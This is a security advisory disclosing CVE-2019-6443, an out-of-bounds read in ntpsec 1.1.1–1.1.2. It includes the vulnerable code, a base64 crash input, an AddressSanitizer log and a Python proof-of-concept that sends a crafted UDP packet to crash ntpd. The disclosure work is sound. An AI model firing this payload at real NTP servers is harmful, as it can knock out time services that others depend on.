_ _
/ | ___| |_ ___ ___ ___ ___
_ / / | | _| . |_ -| -_| _|
|_|_/ |_|_|_| | _|___|___|___|
|_|
2019-01-15
Out-of-bounds read in ntpsec
============================
CVE-2019-6443
This is the first of four bugs. For more visit:
dumpco.re/blog/ntpsec-bugsAn out-of-bounds read bug was found in ntpsec.
Affected versions: ntpsec 1.1.1, 1.1.2
# Timeline
2018-10-15 Bug discovered
2018-10-16 Bug reported
2019-01-13 Vendor released patch version 1.1.3
2019-01-16 MITRE allocated CVE-2019-6443
# Details
The bug exists in ctl_getitem. Code snippet:
2539 /* Scan the string in the packet until we hit comma or
2540 * EoB. Register position of first '=' on the fly. */
2541 for (tp = NULL, cp = reqpt; cp != reqend; ++cp) { // <-- cp incremented out of bounds
2542 if (*cp == '=' && tp == NULL) // <-- cp dereferenced, reading uninitialised data
2543 tp = cp;
2544 if (*cp == ',')
2545 break;
2546 }
# Crash report
# uname -a
Linux h4xb0x 3.16.0-7-amd64 #1 SMP Debian 3.16.59-1 (2018-10-03) x86_64 GNU/Linux
# sha256sum ../../bug1
a3e54a033eea3c3f0a5c795aaa0d8c8b3f4cbb013760e3b1865afb20eb4347b0 ../../bug1
# base64 ../../bug1
TgID7AAAAAAAAALHdGM9EACvLCwsLPoAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsG
CwvOCxQLCwsLCwsLCwsLCwsLCwshCwsLCwsLCwsLCwsLCwsLBgsLzgsLCwsLCwsLCwvk5OULCwsL
IAsLCwsLCws9Yz2sCwsLCy0nCwsLCwsLCwsLCwsLC4ALCwsLCwsLCwsLCwsLCwsLCwv/CwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsCCwsLCwsYCwsLCwsLCwsLCwsLAAAAAsd0Yz0QAK8sLCws
+gAA+gsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwYLC84LFAsLCwsLCwsLCwsLCwsLCyEL
CwsLCwsLCwsLCwsLCwsGCwvOCwsLCwsLCwsLC+Tk5QsLCwsgCwsLCwsLCz1jPawLCwsLLScLCwsL
CwsLCwsLCwsLgAsLCwsLCwsLCwsLCwsLCwsLC/8LCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwILCwsL
CxgLCwsLCwsLCwsLCwsLCwsLCwsLCwsOCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLSwsL
CwsLCwsLCwsLCwsLCwsLCwsLCzupSN0ABAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCw4L
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwtLCwsLCwsLCwsLCwsLCwsLCwsLCwsLO6lI3QAE
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwc=
# ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer-3.5 ./build/main/ntpd/ntpd -n & sleep 1; cat ../../bug1 > /dev/udp/127.0.0.1/5123
2018-10-16T20:36:59 ntpd[18249]: INIT: ntpd ntpsec-1.1.2 2018-10-15T18:34:38Z: Starting
2018-10-16T20:36:59 ntpd[18249]: INIT: Command line: ./build/main/ntpd/ntpd -n
2018-10-16T20:36:59 ntpd[18249]: INIT: precision = 0.131 usec (-23)
2018-10-16T20:36:59 ntpd[18249]: INIT: successfully locked into RAM
2018-10-16T20:36:59 ntpd[18249]: CONFIG: readconfig: parsing file: /etc/ntp.conf
restrict 0.0.0.0: KOD does nothing without LIMITED.
2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict 0.0.0.0: KOD does nothing without LIMITED.
2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict 0.0.0.0: notrap keyword is ignored.
restrict ::: KOD does nothing without LIMITED.
2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict ::: KOD does nothing without LIMITED.
2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict ::: notrap keyword is ignored.
2018-10-16T20:36:59 ntpd[18249]: INIT: Using SO_TIMESTAMPNS
2018-10-16T20:36:59 ntpd[18249]: IO: Listen and drop on 0 v6wildcard [::]:5123
2018-10-16T20:36:59 ntpd[18249]: IO: Listen and drop on 1 v4wildcard 0.0.0.0:5123
2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 2 lo 127.0.0.1:5123
2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 3 eth0 192.168.245.220:5123
2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 4 eth0 192.168.245.131:5123
2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 5 lo [::1]:5123
2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 6 eth0 [fe80::50:56ff:fe38:d7b8%2]:5123
2018-10-16T20:36:59 ntpd[18249]: IO: Listening on routing socket on fd #23 for interface updates
2018-10-16T20:36:59 ntpd[18249]: statistics directory /var/NTP/ does not exist or is unwriteable, error No such file or directory
=================================================================
==18249==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd426ef680 at pc 0x55b2240a8d45 bp 0x7ffd426ee9b0 sp 0x7ffd426ee9a8
READ of size 1 at 0x7ffd426ef680 thread T0
root@h4xb0x:/home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2# #0 0x55b2240a8d44 in ctl_getitem /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2542:7
#1 0x55b22409b636 in read_sysvars /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2804:22
#2 0x55b22409b636 in read_variables /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2866
#3 0x55b22409767c in process_control /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:898:4
#4 0x55b22406991b in receive /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_proto.c:676:3
#5 0x55b22408695e in mainloop /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntpd.c:982:6
#6 0x55b22408695e in ntpdmain /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntpd.c:911
#7 0x55b22408695e in main /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntpd.c:426
#8 0x7f5b8a657b44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287
#9 0x55b22403a48c in _start (/home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/ntpd/ntpd+0x10348c)
Address 0x7ffd426ef680 is located in stack of thread T0 at offset 576 in frame
#0 0x55b2240964bf in process_control /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:768
This frame has 1 object(s):
[32, 576) 'pkt_core' <== Memory access at offset 576 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2542 ctl_getitem
Shadow bytes around the buggy address:
0x1000284d5e80: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
0x1000284d5e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000284d5ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000284d5eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000284d5ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1000284d5ed0:[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
0x1000284d5ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000284d5ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000284d5f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000284d5f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000284d5f20: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
ASan internal: fe
==18249==ABORTING
# Proof of concept exploit
#!/usr/bin/env python
import sys
import socket
buf = ("\x4e\x02\x03\xec\x00\x00\x00\x00\x00\x00\x02\xc7\x74\x63\x3d\x10" +
"\x00\xaf\x2c\x2c\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x14\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x21\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b" +
"\xce\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\xe4\xe4\xe5\x0b\x0b" +
"\x0b\x0b\x20\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x3d\x63\x3d\xac\x0b\x0b" +
"\x0b\x0b\x2d\x27\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x80\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\xff\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x02\x0b\x0b\x0b\x0b\x0b\x18\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x00\x00\x00\x02\xc7\x74\x63\x3d\x10\x00\xaf\x2c\x2c" +
"\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x14\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x21\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\xe4\xe4\xe5\x0b\x0b\x0b\x0b\x20\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x3d\x63\x3d\xac\x0b\x0b\x0b\x0b\x2d\x27" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x80\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\xff\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x02\x0b\x0b\x0b\x0b\x0b\x18\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0e\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x4b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x3b\xa9\x48\xdd\x00\x04\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0e\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x4b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x3b\xa9\x48\xdd\x00\x04\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x07")
sock = socket.socket(
socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))
# Proof of discovery
$ base64 bug1
TgID7AAAAAAAAALHdGM9EACvLCwsLPoAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsG
CwvOCxQLCwsLCwsLCwsLCwsLCwshCwsLCwsLCwsLCwsLCwsLBgsLzgsLCwsLCwsLCwvk5OULCwsL
IAsLCwsLCws9Yz2sCwsLCy0nCwsLCwsLCwsLCwsLC4ALCwsLCwsLCwsLCwsLCwsLCwv/CwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsCCwsLCwsYCwsLCwsLCwsLCwsLAAAAAsd0Yz0QAK8sLCws
+gAA+gsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwYLC84LFAsLCwsLCwsLCwsLCwsLCyEL
CwsLCwsLCwsLCwsLCwsGCwvOCwsLCwsLCwsLC+Tk5QsLCwsgCwsLCwsLCz1jPawLCwsLLScLCwsL
CwsLCwsLCwsLgAsLCwsLCwsLCwsLCwsLCwsLC/8LCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwILCwsL
CxgLCwsLCwsLCwsLCwsLCwsLCwsLCwsOCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLSwsL
CwsLCwsLCwsLCwsLCwsLCwsLCzupSN0ABAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCw4L
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwtLCwsLCwsLCwsLCwsLCwsLCwsLCwsLO6lI3QAE
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwc=
$ sha256sum bug1
a3e54a033eea3c3f0a5c795aaa0d8c8b3f4cbb013760e3b1865afb20eb4347b0 bug1
twitter.com/magnusstubman/status/1051893954705264641# References
-
ftp://ftp.ntpsec.org/pub/releases-
gitlab.com/NTPsec/ntpsec/issues/507-
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6443